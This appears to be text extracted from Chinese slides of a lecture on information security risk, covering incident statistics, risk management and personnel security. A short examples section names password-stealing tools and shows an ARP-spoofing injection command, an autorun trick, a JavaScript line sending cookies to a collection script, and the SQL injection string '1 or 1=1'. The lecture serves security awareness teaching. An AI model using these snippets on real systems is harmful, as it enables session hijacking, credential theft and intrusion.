1、信息安全風(fēng)險及分析,主講：高顯嵩 Email：,個人介紹 高顯嵩,工作經(jīng)歷： 中國“互聯(lián)網(wǎng)信息安全與政府監(jiān)管”專家組成員 中國法證技術(shù)研究組成員 北京司法局電子數(shù)據(jù)鑒定協(xié)會理事 北京廣播電視大學(xué)特聘專家 原微軟公司的技術(shù)支持工程師 項(xiàng)目背景 勞動部全國民辦中介機(jī)構(gòu)信用等級評定系統(tǒng) 勞動部全國知識競賽評分系統(tǒng) 勞動部七個功能平臺合并方案 北京統(tǒng)計局的報表打印系統(tǒng) 北京電大一站式平臺合并的規(guī)劃及實(shí)施 為考研在線提供整體安全解決方安及實(shí)施 為國家電力部內(nèi)部網(wǎng)絡(luò)設(shè)計安全解決方安及實(shí)施 鞍山移動公司網(wǎng)絡(luò)規(guī)劃 長期負(fù)責(zé)北京市安全局國家安全部內(nèi)部技術(shù)培訓(xùn) 負(fù)責(zé)華彬大廈的整個網(wǎng)絡(luò)規(guī)劃及實(shí)施 美國百麥公司北京分

2、公司的整個網(wǎng)絡(luò)規(guī)劃及實(shí)施,主要內(nèi)容,信息安全的重要性 信息安全問題分析 信息安全管理概述 信息安全風(fēng)險管理 信息安全人員管理,信息安全重要性,當(dāng)前我國網(wǎng)絡(luò)信息安全的狀況,網(wǎng)絡(luò)及計算機(jī)病毒傳播泛濫 垃圾郵件和病毒郵件泛濫 黑客攻擊事件頻繁 用戶的個人隱私及計算機(jī)的使用權(quán)受到侵犯 網(wǎng)絡(luò)犯罪事件頻繁監(jiān)管力度不夠 涉及版權(quán)問題的事件增多 沒有統(tǒng)一完善的適合國情的安全標(biāo)準(zhǔn)及法規(guī) 沒有職責(zé)分明的管理部門或管理小組 制約與網(wǎng)絡(luò)基礎(chǔ)設(shè)施和技術(shù)環(huán)境 安全體系不健全 全民安全意識及計算機(jī)網(wǎng)絡(luò)知識薄弱,CERT有關(guān)信息安全的統(tǒng)計,/stats/cert_stats.html,ht

3、tp://stats/cert_stats.html,CERT有關(guān)信息安全的統(tǒng)計,CERT有關(guān)信息安全的統(tǒng)計,/stats/cert_stats.html,網(wǎng)絡(luò)病毒傳播泛濫,據(jù)2001年調(diào)查，我國約73%的計算機(jī)用戶曾感染病毒，2003年上半年升至83%。其中，感染3次以上的用戶高達(dá)59%，而且病毒的破壞性較大，被病毒破壞全部數(shù)據(jù)的占14%，破壞部分?jǐn)?shù)據(jù)的占57%。 對病毒的預(yù)防和發(fā)現(xiàn)速度相對緩慢 垃圾郵件及病毒郵件泛濫,黑客離我們很近,1996年信息安全數(shù)據(jù)顯示，世界上平均每秒就有一起黑客事件發(fā)生，無論是政府機(jī)構(gòu)、軍事部門，還是各大

4、銀行、大公司，只要與互聯(lián)網(wǎng)接軌，就難逃黑客的“黑手”。 據(jù)美國網(wǎng)絡(luò)安全公司Sophos發(fā)布的報告顯示，在2008年第一季度，平均每5秒鐘就會有一個網(wǎng)頁成為黑客們的“盤中餐”。 中國網(wǎng)民每年被網(wǎng)絡(luò)黑客“黑”掉76億元。,FBI計算機(jī)犯罪調(diào)查報告,2002年503家機(jī)構(gòu)中，有60%受到了攻擊 2002年其中223家（占503家的44%）損失的總和達(dá)到$4.55848億 2003年530家機(jī)構(gòu)中有75%（398家）在年內(nèi)受到了攻擊 2003年251家（占530家的47%）的經(jīng)濟(jì)損失總和為$2.01799734 億,全球信息安全損失數(shù)額：,中國已成為全球黑客的第三大來源地,有關(guān)統(tǒng)計數(shù)據(jù)顯示，目前我國9

5、5%的與因特網(wǎng)相聯(lián)的網(wǎng)絡(luò)管理中心都遭到過國境內(nèi)外黑客的攻擊或侵入，受害涉及的覆蓋面越來越大、程度越來越深。據(jù)國際互聯(lián)網(wǎng)保安公司Symantec年的報告指出，中國甚至已經(jīng)成為全球黑客的第三大來源地，竟然有6.9%的攻擊國際互聯(lián)網(wǎng)活動都是由中國發(fā)出的。然而面對這種局面，我國卻缺乏像西方發(fā)達(dá)國家那樣健全的防范措施。,2003年黑客事件,中韓新人王網(wǎng)上對抗 遭黑客入侵推遲10多分鐘 中韓圍棋新人王對抗賽在中國的新浪網(wǎng)和韓國網(wǎng)站落子，孔杰七段執(zhí)白中盤戰(zhàn)勝韓國的宋泰坤四段。賽前，由于有人以孔杰的名字入侵比賽的服務(wù)器，導(dǎo)致比賽推遲了多分鐘才正常進(jìn)行。,2003年黑客事件,百度連續(xù)遭遇嚴(yán)重黑客攻擊 5月15日

6、至5月18日，中文搜索網(wǎng)站百度遭到中國互聯(lián)網(wǎng)有史以來罕見黑客攻擊。據(jù)百度負(fù)責(zé)技術(shù)的副總裁劉建國介紹，自5月15日22:00起，百度的檢索量突然大增，此番增長并未引起工程師注意。5月16日，攻擊更加強(qiáng)烈，每秒鐘攻擊次數(shù)搞到達(dá)1000次，同一個詞被查詢次數(shù)最多達(dá)38863次。據(jù)互聯(lián)網(wǎng)技術(shù)專家介紹，每秒鐘攻擊100次就已經(jīng)屬于非常嚴(yán)重的攻擊，而每秒鐘1000次的攻擊就實(shí)屬罕見,2003年黑客事件,263游戲論壇遭黑客攻擊關(guān)閉,2004年黑客事件,騰訊服務(wù)器被攻擊 10月17日早上10時許，國內(nèi)各地網(wǎng)民陸續(xù)騰訊QQ無法登陸。據(jù)騰訊QQ內(nèi)部技術(shù)人員透露，一國內(nèi)團(tuán)體，利用騰訊QQ服務(wù)器漏洞要挾騰訊支付10

7、0萬美金作為“修復(fù)”費(fèi)用，騰訊QQ不予理睬后，該組織于17日正式發(fā)動攻擊，騰訊QQ服務(wù)器在1個小時內(nèi)大面積出現(xiàn)故障,不得不全面終止進(jìn)行搶修.本次行動組織嚴(yán)謹(jǐn)、操作迅速，業(yè)內(nèi)有部分安全管理人士稱網(wǎng)絡(luò)進(jìn)入軟件綁架勒索時代。,2004年黑客事件,江民網(wǎng)站被攻擊 2004年10月17日國內(nèi)著名的殺毒軟件廠商江民公司的網(wǎng)站被一 名為河馬史詩的黑客攻破，頁面內(nèi)容被篡改。 攻擊緣由：江民公司的最新殺毒軟件產(chǎn)品KV2005的升級導(dǎo)致用戶在上網(wǎng)時無法打開“郵件監(jiān)控和網(wǎng)頁監(jiān)控”，用戶在江民公司的官方論壇發(fā)反映后，江民沒有做出及時的回復(fù)，也沒能在短時間內(nèi)解決用戶的問題。,2005年黑客事件頻繁,也許你的計算機(jī)正在被

8、當(dāng)作從事違法犯罪活動的工具，而當(dāng)這些悄悄發(fā)生的時候，你卻一無所知，因?yàn)槟愕碾娔X已經(jīng)成為被別人控制的“僵尸電腦”。,2005年黑客事件,國內(nèi)首起僵尸網(wǎng)絡(luò)事件 今年27歲的徐立系唐山市某企業(yè)工人，其利用某些手段在互聯(lián)網(wǎng)上傳播其編寫的特定程序，先后植入4萬余臺計算機(jī)，形成了中國首例BOTNET“僵尸網(wǎng)絡(luò)。 2004年10月至2005年1月，徐立操縱“僵尸網(wǎng)絡(luò)”對北京大呂黃鐘電子商務(wù)有限公司所屬音樂網(wǎng)站北京飛行網(wǎng)（簡稱酷樂），發(fā)動多次攻擊，致使該公司蒙受重大經(jīng)濟(jì)損失，并導(dǎo)致北京電信數(shù)據(jù)中心某機(jī)房網(wǎng)絡(luò)設(shè)備大面積癱瘓。,2006年黑客事件,2006年12月31日 中國工商銀行被黑 06年的最后一天，很多網(wǎng)

9、友都收到一些號稱“工行要倒閉，所有存款均沒收”之類的新聞鏈接，地址都是正牌的，而不是盜版的。原來工商被黑客入侵，截止當(dāng)天晚上11點(diǎn)，發(fā)現(xiàn)此漏洞已經(jīng)修改好。,07年第一黑客事件,深圳律師網(wǎng)被黑 當(dāng)進(jìn)入該網(wǎng)站之后，就發(fā)生事故了，發(fā)現(xiàn)，已經(jīng)被黑. 主要有以下字樣： 天空未留痕跡,鳥兒卻已飛過. 網(wǎng)絡(luò)亦是虛擬,瘋狂亦是叛逆.尊敬的網(wǎng)站管理員 您好. .臺灣是中國的，日本是吃S的. .如果你是中國人. .請保留此頁幾天 謝謝!. 少年浪子 所向披靡 OICQ 11888956,例子：得到本地登錄密碼,Pulist.exe+findpass.exe PasswordReminder.exe,例子：記錄本地

10、登錄密碼,GINA PassWord Sniffer,例子得到遠(yuǎn)程計算機(jī)的密碼,IpcScan2.0,例子：更改本地管理員密碼,WindowsNT/2000/XP/2003/Linux/Unix系統(tǒng)，本地接觸可以更改任意用戶的密碼。 一張軟盤更改本地管理員密碼 Ntpassword 一張光盤更改本地管理員密碼 ERD Commander 2003,例子：ERD Commander,例子： ERD Commander,例子：得到他人的郵件密碼,密碼監(jiān)聽器2.8,通過監(jiān)聽得到密碼,通過監(jiān)聽得到密碼,通過監(jiān)聽得到密碼,例子：內(nèi)網(wǎng)滲透 zxarps.exe,內(nèi)網(wǎng)主機(jī)訪問任意站點(diǎn)被入侵 指定的IP段中的

11、用戶訪問的所有網(wǎng)站都插入一個框架代碼 zxarps.exe -idx 0 -ip -9 -port 80 -insert ,ARP協(xié)議工作原理,ARP欺騙交換機(jī),ARP欺騙計算機(jī),例子：內(nèi)網(wǎng)U盤感染,U盤在互聯(lián)網(wǎng)和局域網(wǎng)內(nèi)交叉使用文件被盜取 Autorun.inf autorun風(fēng)暴 autorun open= shellopen=打開( img.src = get_cookie.php?var= + encodeURI(document.cookie); 然后服務(wù)器端使用 PHP 簡單寫了個腳本保存 Cookie 數(shù)據(jù) ,構(gòu)造SQL登陸語句,用戶名

12、: admin 密碼: 1 or 1=1,其他例子,擊鍵記錄 Office文檔掛栽木馬 網(wǎng)頁木馬 木馬捆綁,信息安全管理概述,例一： 局域網(wǎng)內(nèi)病毒泛濫成災(zāi)。 例二： 網(wǎng)絡(luò)中為什么會有ARP欺騙的問題發(fā)生 例三： 局域網(wǎng)內(nèi)計算機(jī)故障頻繁發(fā)生 例四： 為什么要給每個用戶管理員權(quán)限,先來分析兩個例子,信息安全的成敗取決于兩個因素：技術(shù)和管理。 技術(shù)是信息安全的構(gòu)筑材料，管理是真正的粘合劑和催化劑。 人們常說，三分技術(shù)，七分管理，可見管理對信息安全的重要性。 信息安全管理（Information Security Management）作為組織完整的管理體系中一個重要的環(huán)節(jié)，它構(gòu)成了信息安全具有能動性

13、的部分，是指導(dǎo)和控制組織的關(guān)于信息安全風(fēng)險的相互協(xié)調(diào)的活動，其針對對象就是組織的信息資產(chǎn)。 現(xiàn)實(shí)世界里大多數(shù)安全事件的發(fā)生和安全隱患的存在，與其說是技術(shù)上的原因，不如說是管理不善造成的，理解并重視管理對于信息安全的關(guān)鍵作用，對于真正實(shí)現(xiàn)信息安全目標(biāo)來說尤其重要。,什么是信息安全管理？,信息安全管理模型,信息安全必須從整體考慮，必須做到“有計劃有目標(biāo)、發(fā)現(xiàn)問題、分析問題、采取措施解決問題、后續(xù)監(jiān)督避免再現(xiàn)”這樣全程管理的思路，這就要求建立的是一套完整的信息安全管理體系，這樣的系統(tǒng)工程，只有處于組織最高管理者領(lǐng)導(dǎo)和支持之下，才可能成功 最高管理層通過明確信息安全目標(biāo)和方針為信息安全活動指引方向 最

14、高管理層能夠?yàn)樾畔踩顒犹峁┍匾馁Y源支持 最高管理層能夠在重大問題上做出決策 最高管理層可以協(xié)調(diào)組織不同單位不同環(huán)節(jié)的關(guān)系，提升促動力 說到底，最高管理者是組織信息安全的最終責(zé)任人,組織高管全面負(fù)責(zé)信息安全管理,制定有效的安全管理計劃，可以確保信息安全策略得到恰當(dāng)執(zhí)行 進(jìn)行有效安全管理的途徑，應(yīng)該是自上而下的（Top-Down）： 最高管理層負(fù)責(zé)啟動并定義組織的安全方針 管理中層負(fù)責(zé)將安全策略充實(shí)成標(biāo)準(zhǔn)、基線、指南和程序，并監(jiān)督執(zhí)行 業(yè)務(wù)經(jīng)理或安全專家負(fù)責(zé)實(shí)施安全管理文件中的指定配置 最終用戶負(fù)責(zé)遵守組織所有的安全策略 安全管理計劃小組應(yīng)該開發(fā)三類計劃： 戰(zhàn)略計劃（strategic pl

15、an）是長期計劃（例如5年），相對穩(wěn)定，定義了組織的目標(biāo)和使命 戰(zhàn)術(shù)計劃（tactical plan）是中期計劃（例如1年），是對實(shí)現(xiàn)戰(zhàn)略計劃中既定目標(biāo)的任務(wù)和進(jìn)度的細(xì)節(jié)描述，例如雇用計劃、預(yù)算計劃、維護(hù)計劃、系統(tǒng)開發(fā)計劃等 操作計劃（operational plan）是短期的高度細(xì)化的計劃，須經(jīng)常更新（每月或每季度），例如培訓(xùn)計劃、系統(tǒng)部署計劃、產(chǎn)品設(shè)計計劃等,按計劃行事,數(shù)據(jù)收集者（Data Collector）對數(shù)據(jù)主體（Data Subject）：準(zhǔn)確（Accuracy）、隱私（Privacy）； 數(shù)據(jù)保管者（Data Custodian）對數(shù)據(jù)擁有者（Data Owner）：可用性（

16、Availability）、完整性（Integrity）、保密性（Confidentiality）； 數(shù)據(jù)用戶（Data Users）對擁有者/主體（Owner/Subject）：保密性（Confidentiality）和完整性； 系統(tǒng)用戶（System Users）對系統(tǒng)擁有者（System Owner）：可用性（Availability）和軟件完整性（Software Integrity）； 系統(tǒng)管理者（System Manager）對用戶（Users），可用性（Integrity）、完整性（Integrity）； 用戶（Users）對其它用戶（Other Users）：可用性（Avail

17、ability）。,重要角色和職責(zé),信息安全管風(fēng)險管理,風(fēng)險,風(fēng)險管理（Risk Management）就是識別風(fēng)險、評估風(fēng)險、采取措施將風(fēng)險減少到可接受水平，并維持這個風(fēng)險水平的過程。風(fēng)險管理是信息安全管理的核心內(nèi)容。,在信息安全領(lǐng)域，風(fēng)險（Risk）就是指信息資產(chǎn)遭受損壞并給企業(yè)帶來負(fù)面影響的潛在可能性。,風(fēng)險管理,風(fēng)險管理概述,資產(chǎn)（Asset） 對組織具有價值的信息資產(chǎn)，包括計算機(jī)硬件、通信設(shè)施、數(shù)據(jù)庫、文檔信息、軟件、信息服務(wù)和人員等，所有這些資產(chǎn)都需要妥善保護(hù)。 威脅（Threat） 可能對資產(chǎn)或組織造成損害的某種安全事件發(fā)生的潛在原因，需要識別出威脅源（Threat source

18、）或威脅代理（Threat agent）。 弱點(diǎn)（Vulnerability） 也被稱作漏洞或脆弱性，即資產(chǎn)或資產(chǎn)組中存在的可被威脅利用的缺點(diǎn)，弱點(diǎn)一旦被利用，就可能對資產(chǎn)造成損害。 風(fēng)險（Risk） 特定威脅利用資產(chǎn)弱點(diǎn)給資產(chǎn)或資產(chǎn)組帶來損害的潛在可能性。 可能性（Likelihood） 對威脅發(fā)生幾率（Probability）或頻率（Frequency）的定性描述。 影響（Impact） 后果（Consequence），意外事件發(fā)生給組織帶來的直接或間接的損失或傷害。 安全措施（Safeguard） 控制（control）或?qū)Σ撸╟ountermeasure），即通過防范威脅、減少弱點(diǎn)、限

19、制意外事件帶來影響等途徑來消減風(fēng)險的機(jī)制、方法和措施。 殘留風(fēng)險（Residual Risk） 在實(shí)施安全措施之后仍然存在的風(fēng)險。,風(fēng)險管理相關(guān)要素,風(fēng)險管理的目標(biāo),關(guān)鍵是達(dá)成成本利益的平衡,風(fēng)險管理的一般過程,風(fēng)險評估（Risk Assessment）是對信息資產(chǎn)及其價值、面臨的威脅、存在的弱點(diǎn)，以及三者綜合作用而帶來風(fēng)險的大小或水平的評估。 作為風(fēng)險管理的基礎(chǔ)，風(fēng)險評估是組織確定信息安全需求的一個重要途徑，屬于組織信息安全管理體系策劃的過程。主要任務(wù)包括： 識別構(gòu)成風(fēng)險的各種因素 評估風(fēng)險發(fā)生的可能性和造成的影響，并最終評價風(fēng)險水平或大小 確定組織承受風(fēng)險的能力 確定風(fēng)險消減和控制的策略、

20、目標(biāo)和優(yōu)先順序 推薦風(fēng)險消減對策以供實(shí)施 包括風(fēng)險分析（Risk Analysis）和風(fēng)險評價（Risk Evaluation）兩部分，但一般來說，風(fēng)險評估和風(fēng)險分析同義。,什么是風(fēng)險評估？,降低風(fēng)險（Reduce Risk） 實(shí)施有效控制，將風(fēng)險降低到可接受的程度，實(shí)際上就是力圖減小威脅發(fā)生的可能性和帶來的影響，包括： 減少威脅：例如，實(shí)施惡意軟件控制程序，減少信息系統(tǒng)受惡意軟件攻擊的機(jī)會 減少弱點(diǎn)：例如，通過安全意識培訓(xùn)，強(qiáng)化職員的安全意識與安全操作能力 降低影響：例如，制定災(zāi)難恢復(fù)計劃和業(yè)務(wù)連續(xù)性計劃，做好備份 規(guī)避風(fēng)險（Avoid Risk） 或者Rejecting Risk。有時候，

21、組織可以選擇放棄某些可能引來風(fēng)險的業(yè)務(wù)或資產(chǎn)，以此規(guī)避風(fēng)險。例如，將重要的計算機(jī)系統(tǒng)與互聯(lián)網(wǎng)隔離，使其免遭來自外部網(wǎng)絡(luò)的攻擊。 轉(zhuǎn)嫁風(fēng)險（Transfer Risk） 也稱作Risk Assignment。將風(fēng)險全部或者部分地轉(zhuǎn)移到其他責(zé)任方，例如購買商業(yè)保險。 接受風(fēng)險（Accept Risk） 在實(shí)施了其他風(fēng)險應(yīng)對措施之后，對于殘留的風(fēng)險，組織可以選擇接受。,確定風(fēng)險消減策略,絕對安全（即零風(fēng)險）是不可能的。 實(shí)施安全控制后會有殘留風(fēng)險或殘存風(fēng)險（Residual Risk）。 為了實(shí)現(xiàn)信息安全，應(yīng)該確保殘留風(fēng)險在可接受的范圍內(nèi)： 殘留風(fēng)險Rr 原有風(fēng)險R0 控制效力R 殘留風(fēng)險Rr 可接

22、受的風(fēng)險Rt 對殘留風(fēng)險進(jìn)行確認(rèn)和評價的過程其實(shí)就是風(fēng)險接受的過程。決策者可以根據(jù)風(fēng)險評估的結(jié)果來確定一個閥值，以該閥值作為是否接受殘留風(fēng)險的標(biāo)準(zhǔn)。,評價殘留風(fēng)險,信息安全人員管理,人是信息安全的關(guān)鍵因素，人員管理不善會給組織帶來非常大的安全威脅和風(fēng)險。 有調(diào)查顯示，大多數(shù)重大信息安全事件通常都來自組織內(nèi)部，例如，員工受利益驅(qū)使將公司技術(shù)圖紙出賣給競爭對手，利用內(nèi)部系統(tǒng)從事經(jīng)濟(jì)犯罪活動，或者由于缺乏安全意識或操作技能而導(dǎo)致誤操作，引起信息系統(tǒng)故障等。 為降低內(nèi)部員工所帶來的人為差錯、盜竊、欺詐及濫用設(shè)施的風(fēng)險，并且避免引發(fā)法律風(fēng)險，組織應(yīng)該采取措施，加強(qiáng)內(nèi)部人員的安全管理： 對工作申請者實(shí)施背

23、景檢查 簽署雇用合同和保密協(xié)議 加強(qiáng)在職人員的安全管理 嚴(yán)格控制人員離職程序,必須高度重視人員安全問題,背景檢查是工作申請過程的一個部分，組織至少會審查申請人簡歷中的基本信息。對于敏感職位，可能還會考慮進(jìn)一步的調(diào)查。調(diào)查過程中，組織可以請求訪問申請人的信用和犯罪記錄，甚至可以聘請外部公司對申請人進(jìn)行調(diào)查，以確定是否存在潛在問題或利益沖突。 通過背景檢查，可以防止： 因?yàn)槿藛T解雇而導(dǎo)致法律訴訟 因?yàn)楣陀檬韬龆鴮?dǎo)致第三方的法律訴訟 雇用不合格的人員 喪失商業(yè)秘密 員工從一般崗位轉(zhuǎn)入信息安全重要崗位，組織也應(yīng)當(dāng)對其進(jìn)行檢查，對于處在有相當(dāng)權(quán)力位置的人員，這種檢查應(yīng)定期進(jìn)行。,背景檢查（Backgro

24、und Check）,組織應(yīng)與所有員工簽訂保密協(xié)議，作為雇用合同基本條款的一部分 保密協(xié)議應(yīng)明確規(guī)定雇員對組織信息安全的責(zé)任、保密要求及違約的法律責(zé)任 簽訂保密承諾旨在加強(qiáng)員工對組織信息安全應(yīng)承擔(dān)的責(zé)任，協(xié)議上應(yīng)有員工的簽名并由其保存一份協(xié)議副本 對于處于試用期的新員工，要求其簽訂一份保密承諾 在允許第三方用戶使用信息處理設(shè)施之前，要求其簽訂保密協(xié)議 當(dāng)雇用期或合同期有更改，特別是雇員到期離職或合同終止時，應(yīng)重申保密協(xié)議,保密協(xié)議（ Confidentiality Agreement ）,職務(wù)分離（Separation of Duties），將一個關(guān)鍵任務(wù)分成多個不同的部分，每個部分由不同的人執(zhí)行。 共謀（Collusion），進(jìn)行欺詐（Fraud）需要多個人共謀。 目的： 制約，減少人為破壞的幾率。 補(bǔ)充，減少人為疏忽和錯誤的幾率。,職務(wù)分離,將操作人員（Operator）分割為分離角色（Roles）